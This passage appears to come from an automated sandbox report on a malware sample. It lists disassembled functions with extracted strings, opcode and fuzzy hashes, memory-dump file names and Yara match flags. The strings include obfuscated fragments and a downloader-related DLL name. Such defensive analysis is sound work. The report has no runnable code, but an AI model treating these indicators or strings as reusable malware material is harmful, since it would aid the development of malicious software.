                    • RTL: Re-Waiting, xrefs: 213E031E
                    • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 213E02E7
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2818730058.0000000021340000.00000040.00001000.00020000.00000000.sdmp, Offset: 21340000, based on PE: true
                    • Associated: 0000000A.00000002.2818730058.0000000021469000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 0000000A.00000002.2818730058.000000002146D000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 0000000A.00000002.2818730058.00000000214DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_21340000_wab.jbxd
                    Similarity
                    • API ID:
                    • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                    • API String ID: 0-2474120054
                    • Opcode ID: 84fd864d7b1eecdc37a425ba03b9afbf686aec653b032031293864021552bfc2
                    • Instruction ID: d94c332d4a975027e09247386a587de26b7127baab515bad82089b70bb50a2c1
                    • Opcode Fuzzy Hash: 84fd864d7b1eecdc37a425ba03b9afbf686aec653b032031293864021552bfc2
                    • Instruction Fuzzy Hash: 7DE19F306087459FD711CF28C884B5ABBEABF85368F100A6DF9A9CB2E1D774D945CB42
                    Function 213ABED0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 129COMMON
                    Download Yara Rule
                    Strings
                    • RTL: Re-Waiting, xrefs: 213E7BAC
                    • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 213E7B7F
                    • RTL: Resource at %p, xrefs: 213E7B8E
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2818730058.0000000021340000.00000040.00001000.00020000.00000000.sdmp, Offset: 21340000, based on PE: true
                    • Associated: 0000000A.00000002.2818730058.0000000021469000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 0000000A.00000002.2818730058.000000002146D000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 0000000A.00000002.2818730058.00000000214DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_21340000_wab.jbxd
                    Similarity
                    • API ID:
                    • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                    • API String ID: 0-871070163
                    • Opcode ID: 50d46a6164938549cac3d5e4a93ea2bb337c9b8926da5a7b245eb2c2d6907b00
                    • Instruction ID: c2831a6c3913ceeccc5278b960846490c3b731ae877fac93458666b9454ad82f
                    • Opcode Fuzzy Hash: 50d46a6164938549cac3d5e4a93ea2bb337c9b8926da5a7b245eb2c2d6907b00
                    • Instruction Fuzzy Hash: 4941E4353007079FD720CE25C840F5AB7EAEF99718F100A2DEA5AD7680DB31E9058B91
                    Function 213AB4C0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 121COMMON
                    Download Yara Rule
                    APIs
                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 213E728C
                    Strings
                    • RTL: Re-Waiting, xrefs: 213E72C1
                    • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 213E7294
                    • RTL: Resource at %p, xrefs: 213E72A3
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2818730058.0000000021340000.00000040.00001000.00020000.00000000.sdmp, Offset: 21340000, based on PE: true
                    • Associated: 0000000A.00000002.2818730058.0000000021469000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 0000000A.00000002.2818730058.000000002146D000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 0000000A.00000002.2818730058.00000000214DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_21340000_wab.jbxd
                    Similarity
                    • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                    • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                    • API String ID: 885266447-605551621
                    • Opcode ID: aeb132d90694f9f9eee2a34d08217af075af9a807a0a446e7a29e505dcd116ab
                    • Instruction ID: 5c288f9d1ce14f42486da1ac9190b4a85929bf0004b4d05b30ecbddb971c0fae
                    • Opcode Fuzzy Hash: aeb132d90694f9f9eee2a34d08217af075af9a807a0a446e7a29e505dcd116ab
                    • Instruction Fuzzy Hash: D141E235600316AFD721CE25CC41F96BBABFF55718F100619FA59EB240DB31E94287D1
                    Function 21422300 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 90COMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2818730058.0000000021340000.00000040.00001000.00020000.00000000.sdmp, Offset: 21340000, based on PE: true
                    • Associated: 0000000A.00000002.2818730058.0000000021469000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 0000000A.00000002.2818730058.000000002146D000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 0000000A.00000002.2818730058.00000000214DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_21340000_wab.jbxd
                    Similarity
                    • API ID: ___swprintf_l
                    • String ID: %%%u$]:%u
                    • API String ID: 48624451-3050659472
                    • Opcode ID: ea75849664936fcb7a1f1aba1f6664fb785707e4cbd05f6e6638bbc8697ef15b
                    • Instruction ID: f2702da1b99922d7f918468fb9d17782eb93eadc83ae4b7ca48791f034cdc86d
                    • Opcode Fuzzy Hash: ea75849664936fcb7a1f1aba1f6664fb785707e4cbd05f6e6638bbc8697ef15b
                    • Instruction Fuzzy Hash: 7C318472A005199FDB50CE39CC40FEE77F9EF54614F40059AED4DE3200EB30AA848BA0
                    Function 213B7D61 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 284COMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2818730058.0000000021340000.00000040.00001000.00020000.00000000.sdmp, Offset: 21340000, based on PE: true
                    • Associated: 0000000A.00000002.2818730058.0000000021469000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 0000000A.00000002.2818730058.000000002146D000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 0000000A.00000002.2818730058.00000000214DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_21340000_wab.jbxd
                    Similarity
                    • API ID: __aulldvrm
                    • String ID: +$-
                    • API String ID: 1302938615-2137968064
                    • Opcode ID: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                    • Instruction ID: 629c0d7bd01aaccfddfaebb77f1cfe3f6628b64ef7712044b664f90e67985fbb
                    • Opcode Fuzzy Hash: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                    • Instruction Fuzzy Hash: D391B371E0020A9FEB10CF69C881AAEBBB7EF45768F10451EE955EBAC1F7308B418755
                    Function 21379126 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 199COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2818730058.0000000021340000.00000040.00001000.00020000.00000000.sdmp, Offset: 21340000, based on PE: true
                    • Associated: 0000000A.00000002.2818730058.0000000021469000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 0000000A.00000002.2818730058.000000002146D000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 0000000A.00000002.2818730058.00000000214DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_21340000_wab.jbxd
                    Similarity
                    • API ID:
                    • String ID: $$@
                    • API String ID: 0-1194432280
                    • Opcode ID: 1717b265fce83dc60ade469248a9e49345108e62e98556ee1edc6ae9ab6fd769
                    • Instruction ID: 697d4ca63dc584a9917806871084d58bc10795eeecc2ffc7f746a3c990be4fc0
                    • Opcode Fuzzy Hash: 1717b265fce83dc60ade469248a9e49345108e62e98556ee1edc6ae9ab6fd769
                    • Instruction Fuzzy Hash: 42812972D01269DBDB21CF54CC44BDABBB9AF48754F0041EAEA19B7240E7749E85CFA0

                    Executed Functions

                    Function 03C86376 Relevance: 41.7, Strings: 33, Instructions: 494COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 0000000D.00000002.3288337400.00000000039B0000.00000040.00000001.00040000.00000000.sdmp, Offset: 039B0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_13_2_39b0000_nPzDKsDmTWqJ.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID: "z$$$$$$%E$)n$-*$-O$-e$.D$.]$/$/$/-$1$@$B$B$H$K$LP$MI$Rw$R|$V$V!$^$`$b$d($e${*$1$9
                    • API String ID: 0-3973920184
                    • Opcode ID: 71e7849872164fb85498d68d1d4c0f3fa22628c71745a47da2dc98fe5fe9202a
                    • Instruction ID: 185e265b43adfcc9793025dac30ee858f9b29415587ff580f3178620fb1cd062
                    • Opcode Fuzzy Hash: 71e7849872164fb85498d68d1d4c0f3fa22628c71745a47da2dc98fe5fe9202a
                    • Instruction Fuzzy Hash: 9752BCB0D05229CFEB24CF45C998BDDBBB1BB45308F1081DAC649AB281C7B95B99CF50
                    Function 03C93C6F Relevance: 6.4, Strings: 5, Instructions: 151COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 0000000D.00000002.3288337400.00000000039B0000.00000040.00000001.00040000.00000000.sdmp, Offset: 039B0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_13_2_39b0000_nPzDKsDmTWqJ.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID: 6$O$S$\$s
                    • API String ID: 0-3854637164
                    • Opcode ID: 9c55d290759825e9b7e6c93ed43b65ba0f90b2bb4b5f3b7b8ae7eb0d5c328ac3
                    • Instruction ID: 0de099a48969fe799cc919f0fedfb6251e8ef6769003f760cd4e32f577716eb9
                    • Opcode Fuzzy Hash: 9c55d290759825e9b7e6c93ed43b65ba0f90b2bb4b5f3b7b8ae7eb0d5c328ac3
                    • Instruction Fuzzy Hash: B341B6B7D00219BBDB20EB98DD48FEBB3B8EB44314F054199E909DA140E775AB548BD1
                    Function 03CA17E6 Relevance: 2.6, Strings: 2, Instructions: 60COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 0000000D.00000002.3288337400.00000000039B0000.00000040.00000001.00040000.00000000.sdmp, Offset: 039B0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_13_2_39b0000_nPzDKsDmTWqJ.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID: Ao$u>
                    • API String ID: 0-1821974421
                    • Opcode ID: a6c06f951b5d4d5ac4112044ee89f66351e8108fb99aa75e06ddd10a0ebb799e
                    • Instruction ID: b1c59b67ec36160e7d06de9a6d63181e13c530ce21334ca233083149ee665721
                    • Opcode Fuzzy Hash: a6c06f951b5d4d5ac4112044ee89f66351e8108fb99aa75e06ddd10a0ebb799e
                    • Instruction Fuzzy Hash: 8311FBB6D0121DAF9B00DFA9D8409EEBBF9EF48210F04416AE919E7200E7705A148BA1
                    Function 03C7FFE3 Relevance: .1, Instructions: 131COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 0000000D.00000002.3288337400.00000000039B0000.00000040.00000001.00040000.00000000.sdmp, Offset: 039B0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_13_2_39b0000_nPzDKsDmTWqJ.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 0e02748d08aee7d1cc6c5446b4237b042f52691179fc5f9ead1cf3ae4c5bc068
                    • Instruction ID: 741441b522b8b5d854d16ebf44191d2cb62debd488070c39482fa89aa2c92a49
                    • Opcode Fuzzy Hash: 0e02748d08aee7d1cc6c5446b4237b042f52691179fc5f9ead1cf3ae4c5bc068
                    • Instruction Fuzzy Hash: 684120B1D11229AFDB14DF99CC81AEFBBBCEF48714F10415AF918E6240E7B19640CBA5
                    Function 03CA3856 Relevance: .1, Instructions: 82COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 0000000D.00000002.3288337400.00000000039B0000.00000040.00000001.00040000.00000000.sdmp, Offset: 039B0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_13_2_39b0000_nPzDKsDmTWqJ.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 25e17d349fb5b631bfb505b1321c8da11228fe3d340b2b4b23471701c4726890
                    • Instruction ID: 0b9883b94e7dc398273f182e682bb8f9d99803964e2cc6dde6372b44603fe3e0
                    • Opcode Fuzzy Hash: 25e17d349fb5b631bfb505b1321c8da11228fe3d340b2b4b23471701c4726890
                    • Instruction Fuzzy Hash: 2821F7B5A01609AFDB14DF98DC85EEF77B9AF88314F108209FD18E7240DA31A911CBA5
                    Function 03C93AB6 Relevance: .1, Instructions: 75COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 0000000D.00000002.3288337400.00000000039B0000.00000040.00000001.00040000.00000000.sdmp, Offset: 039B0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_13_2_39b0000_nPzDKsDmTWqJ.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 6ff2fa24ec6e103946d44252b206051815aa09a18ffa4e254bfd89492ad2bb40
                    • Instruction ID: 168a5a2ea5cb1bb436b489a743329dd27460e229db4a73b433d74a332e9bfed0
                    • Opcode Fuzzy Hash: 6ff2fa24ec6e103946d44252b206051815aa09a18ffa4e254bfd89492ad2bb40
                    • Instruction Fuzzy Hash: 6711C2B63803057BF720EA598C43FAB376C9B84B14F254015FB08EE2C1E6A5B81156B9
                    Function 03CA4196 Relevance: .1, Instructions: 74COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 0000000D.00000002.3288337400.00000000039B0000.00000040.00000001.00040000.00000000.sdmp, Offset: 039B0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_13_2_39b0000_nPzDKsDmTWqJ.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 57147239b44ef1d29857aa3d66b275ece1686b6a610650e974492640e68748ec
                    • Instruction ID: 7001751294e51baace2ae113db5c055478d29bb5cc9d452bee762bfbe7806f3f
                    • Opcode Fuzzy Hash: 57147239b44ef1d29857aa3d66b275ece1686b6a610650e974492640e68748ec
                    • Instruction Fuzzy Hash: 2C211DB5A00609AFDB14DF99DC45EAB77B8EF89710F108609FD18D7240D770A9518BA1
                    Function 03CA3676 Relevance: .1, Instructions: 62COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 0000000D.00000002.3288337400.00000000039B0000.00000040.00000001.00040000.00000000.sdmp, Offset: 039B0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_13_2_39b0000_nPzDKsDmTWqJ.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: a7adbcfa4f0add5f962326dbc1504fae2a65528200220ea98d4f18d971da3eab
                    • Instruction ID: 6650639af33fa5e180788915eaccf97477829baea845f1a61026bfd667aff336
                    • Opcode Fuzzy Hash: a7adbcfa4f0add5f962326dbc1504fae2a65528200220ea98d4f18d971da3eab
                    • Instruction Fuzzy Hash: 211191759007057BD720EB69DC45FAB77BCEF89310F008509FE18DB280EB7165108BA1
                    Function 03CA05B6 Relevance: .1, Instructions: 62COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 0000000D.00000002.3288337400.00000000039B0000.00000040.00000001.00040000.00000000.sdmp, Offset: 039B0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_13_2_39b0000_nPzDKsDmTWqJ.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 78256cddf642865f94fb0f6f0988303c5efcfbdaf19f3c59a4da2679db52dc8c
                    • Instruction ID: 446d6842051764a6cf84245b7d0e0f1134f5b0530ff628dc13c2e19ce18c29db
                    • Opcode Fuzzy Hash: 78256cddf642865f94fb0f6f0988303c5efcfbdaf19f3c59a4da2679db52dc8c
                    • Instruction Fuzzy Hash: 2D11ECF6D0121DAF9B40DFA9D9409EFBBF8EF88700F04416AE919E7200E7705A148BA1
                    Function 03CA3516 Relevance: .1, Instructions: 62COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 0000000D.00000002.3288337400.00000000039B0000.00000040.00000001.00040000.00000000.sdmp, Offset: 039B0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_13_2_39b0000_nPzDKsDmTWqJ.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 721853e0717aed0137ac124d5e12327b15061fa6eaad6225241bc2ede823d4c5
                    • Instruction ID: a18601707e7cf3021d33b5bbde4dee82d69ffa5363eb509b721e34f9a0fd52aa
                    • Opcode Fuzzy Hash: 721853e0717aed0137ac124d5e12327b15061fa6eaad6225241bc2ede823d4c5
                    • Instruction Fuzzy Hash: 73113A75A007047FD620EB69DC45FABB7ACEF89710F018549FE18DB280EB71A9118BA1
                    Function 03CA44E6 Relevance: .0, Instructions: 47COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 0000000D.00000002.3288337400.00000000039B0000.00000040.00000001.00040000.00000000.sdmp, Offset: 039B0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_13_2_39b0000_nPzDKsDmTWqJ.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 450cb9c7663112ca210b0cb6c60cfdfedc45c319147f1a5182a9a80414c57d4f
                    • Instruction ID: 802d8876345b370866929718f477bb878ac15a7a76631781d4b6c3cfd583ced8
                    • Opcode Fuzzy Hash: 450cb9c7663112ca210b0cb6c60cfdfedc45c319147f1a5182a9a80414c57d4f
                    • Instruction Fuzzy Hash: 2401CCB2200609BBCB14DE89DC84EEB77ADAF8C714F018208BA09E7240D630F8518BA4
                    Function 03C8012A Relevance: .0, Instructions: 46COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 0000000D.00000002.3288337400.00000000039B0000.00000040.00000001.00040000.00000000.sdmp, Offset: 039B0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_13_2_39b0000_nPzDKsDmTWqJ.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: d4d9e18442c034a6d1c0e34cb45da3528f9018b2d65717231f0997bf664d55d5
                    • Instruction ID: 1aefefe0bd8198934a3f3dfdae3ab5af19c1f0a0c888ca780b542f0d94d7ec6d
                    • Opcode Fuzzy Hash: d4d9e18442c034a6d1c0e34cb45da3528f9018b2d65717231f0997bf664d55d5
                    • Instruction Fuzzy Hash: F3F0F6732003162BD710AA2D9C84B87F79CEB89334F110222F92CCB241D67294158390
                    Function 03CA0526 Relevance: .0, Instructions: 46COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 0000000D.00000002.3288337400.00000000039B0000.00000040.00000001.00040000.00000000.sdmp, Offset: 039B0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_13_2_39b0000_nPzDKsDmTWqJ.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 9def3a84266962d4f552916792aba8a09b4ecf02272c456a6a249810f305bf98
                    • Instruction ID: 2466714bac11c85f4b916600f78de1889d52a89fe02985e44dafd2c1dddf6413
                    • Opcode Fuzzy Hash: 9def3a84266962d4f552916792aba8a09b4ecf02272c456a6a249810f305bf98
                    • Instruction Fuzzy Hash: 1501E9FAC0121DAFCB40DFE8D9409EEBBF8AB48200F14426AD919F7200F7755A048BA1
                    Function 03CA3766 Relevance: .0, Instructions: 33COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 0000000D.00000002.3288337400.00000000039B0000.00000040.00000001.00040000.00000000.sdmp, Offset: 039B0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_13_2_39b0000_nPzDKsDmTWqJ.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 3831e38d0f1520392d2e538a41e312410c75e2cb95c2f7a640432c2e3e1438d1
                    • Instruction ID: 77a195719d9281caf0d91e667e39069268d5a1c9a923939f41662b179c83dd7b
                    • Opcode Fuzzy Hash: 3831e38d0f1520392d2e538a41e312410c75e2cb95c2f7a640432c2e3e1438d1
                    • Instruction Fuzzy Hash: A2F0F8B56006057FC710EE99DC45EAB77ACEF89650F008109BE18D7241D670B9118BB1
                    Function 03C93BD6 Relevance: .0, Instructions: 29COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 0000000D.00000002.3288337400.00000000039B0000.00000040.00000001.00040000.00000000.sdmp, Offset: 039B0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_13_2_39b0000_nPzDKsDmTWqJ.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: ed592dfed463adf66a7e35798911d3c5fe923e8226bf3130026c1952ef4f2681
                    • Instruction ID: f91bc0bba4f6d91647c83ab857c6750df15d54649e2d823f55ba220cfed188fd
                    • Opcode Fuzzy Hash: ed592dfed463adf66a7e35798911d3c5fe923e8226bf3130026c1952ef4f2681
                    • Instruction Fuzzy Hash: C6F08275C09249EBDF14DF68D841BDEBBB8EB04320F1083AAE824DB2C0E63497508781
                    Function 03CA4406 Relevance: .0, Instructions: 29COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 0000000D.00000002.3288337400.00000000039B0000.00000040.00000001.00040000.00000000.sdmp, Offset: 039B0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_13_2_39b0000_nPzDKsDmTWqJ.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 504fe083870a0fa2096c11ce1490c744b46d51673e052a9510a6b519a7afd9aa
                    • Instruction ID: c2982ad87cb0e164d5bf59d9187138e0d6971e1a6f525dbac1b7f8a552fb1d04
                    • Opcode Fuzzy Hash: 504fe083870a0fa2096c11ce1490c744b46d51673e052a9510a6b519a7afd9aa
                    • Instruction Fuzzy Hash: 1EE065B66042047BD624EE99DC49FEB73ACEF8A710F004019FA08EB240D630B910CAB5
                    Function 03CA6096 Relevance: .0, Instructions: 28COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 0000000D.00000002.3288337400.00000000039B0000.00000040.00000001.00040000.00000000.sdmp, Offset: 039B0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_13_2_39b0000_nPzDKsDmTWqJ.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 28e99eae625116fa1876087960d92f7e841b892ab241dc61725a62769b807db2
                    • Instruction ID: dc1e341a9fcc07dc71e75135c7add87b04be161948115dd440bd81bded0926df
                    • Opcode Fuzzy Hash: 28e99eae625116fa1876087960d92f7e841b892ab241dc61725a62769b807db2
                    • Instruction Fuzzy Hash: 23E0DF3660061227D220A18DCC05F97B75C8BC0A28F0E0024FE08DF300E261A91082E8
                    Function 03CA4106 Relevance: .0, Instructions: 25COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 0000000D.00000002.3288337400.00000000039B0000.00000040.00000001.00040000.00000000.sdmp, Offset: 039B0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_13_2_39b0000_nPzDKsDmTWqJ.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 9cabf88f7ebf607d24702660be94398df66291ecf44b2da18a7e530c6de45284
                    • Instruction ID: 5708f322a6b7a3b5f8cb33287fafe9d967de385c55a505d4146255a348ea812b
                    • Opcode Fuzzy Hash: 9cabf88f7ebf607d24702660be94398df66291ecf44b2da18a7e530c6de45284
                    • Instruction Fuzzy Hash: B5E0467A2016047BD620EB6ACC09EDB77ADDFCA760F418415FA08AB241CA71B9108AF0
                    Function 03C86E27 Relevance: .0, Instructions: 7COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 0000000D.00000002.3288337400.00000000039B0000.00000040.00000001.00040000.00000000.sdmp, Offset: 039B0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_13_2_39b0000_nPzDKsDmTWqJ.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 9382b98407feac2b9cf2b2466ea54af440cb9e950fed6df6a9fb7227d893ab8b
                    • Instruction ID: ff3df7b9ed5dd41c0d792b9cf9ca5b89c3e6516a55d65f9c6b404aaa5c5aac2b
                    • Opcode Fuzzy Hash: 9382b98407feac2b9cf2b2466ea54af440cb9e950fed6df6a9fb7227d893ab8b
                    • Instruction Fuzzy Hash: B4A0228E000202200C32323C3B008A30F3288830B82C20220E0A3EC22BC380CAB0A002

                    Non-executed Functions

                    Function 03C8FE38 Relevance: 51.4, Strings: 41, Instructions: 172COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 0000000D.00000002.3288337400.00000000039B0000.00000040.00000001.00040000.00000000.sdmp, Offset: 039B0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_13_2_39b0000_nPzDKsDmTWqJ.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID: !"#$$%&'($)*+,$-./0$123@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@@@@@$@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@>@@@?456789:;<=@@@@@@@
                    • API String ID: 0-3248090998
                    • Opcode ID: 36ec1750e68b86c0bcc5e55fc4f0e1a308ef9268d55ba95c02ad922fcb1f333b
                    • Instruction ID: 20a7ef1bec9f3b382374c52d68a48da33bafc6d6c03ce96848af399c1a52e81b
                    • Opcode Fuzzy Hash: 36ec1750e68b86c0bcc5e55fc4f0e1a308ef9268d55ba95c02ad922fcb1f333b
                    • Instruction Fuzzy Hash: 4391FFF08052A98EDB118F55A4603DFBF71BB85204F1581E9C6AA7B243C3BE4E46DF90
                    Function 03C7FDD5 Relevance: 36.3, Strings: 29, Instructions: 50COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 0000000D.00000002.3288337400.00000000039B0000.00000040.00000001.00040000.00000000.sdmp, Offset: 039B0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_13_2_39b0000_nPzDKsDmTWqJ.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID: &";$ ;%5$!%&;$#$#!<5$#;$.$$ "5$&";&$&";&#$&#5=$5BZB$5[A5$;%;'$=B|{$Ftst$Rpv~$Teey$Xzo|$Y95y$^]AX$^|a:$g|: $p:!!$pBpw$qzbf$yyt:$z<5V$|~p5$}gzx
                    • API String ID: 0-1864101840
                    • Opcode ID: 6669d24830f2ddc8a7a436d3351cb22f26dc9d56462e166f44be692c93ae7a2b
                    • Instruction ID: bdee0b20475d3eb1b5b5fabc195a47b8af0a21dac3db2aff2bee8107f9ae5162
                    • Opcode Fuzzy Hash: 6669d24830f2ddc8a7a436d3351cb22f26dc9d56462e166f44be692c93ae7a2b
                    • Instruction Fuzzy Hash: 4D21BCB5C102589BCB14CFD6E9846EEBB74BB05340F60924CE4296F258D3765A42CF99
                    Function 03C9DB76 Relevance: 34.0, Strings: 27, Instructions: 261COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 0000000D.00000002.3288337400.00000000039B0000.00000040.00000001.00040000.00000000.sdmp, Offset: 039B0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_13_2_39b0000_nPzDKsDmTWqJ.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID: $$$$%$)$)$.$5$>$B$E$F$F$H$J$Q$T$g$h$i$m$s$u$urlmon.dll$v$w$}$}
                    • API String ID: 0-1002149817
                    • Opcode ID: c4c1164c8ffbc00c798c4cf91f2794285e24993db59e7595ee0764830dab720d
                    • Instruction ID: f4aee0a014cba075d1a84fdee94287ffe5f7d4a223d5b53d7f4e87cf4610af42
                    • Opcode Fuzzy Hash: c4c1164c8ffbc00c798c4cf91f2794285e24993db59e7595ee0764830dab720d
                    • Instruction Fuzzy Hash: 14C11CB5D003689EDF20DFA4CD44BEEBBB9AF45304F00819AD54CEB241E7B54A889F95
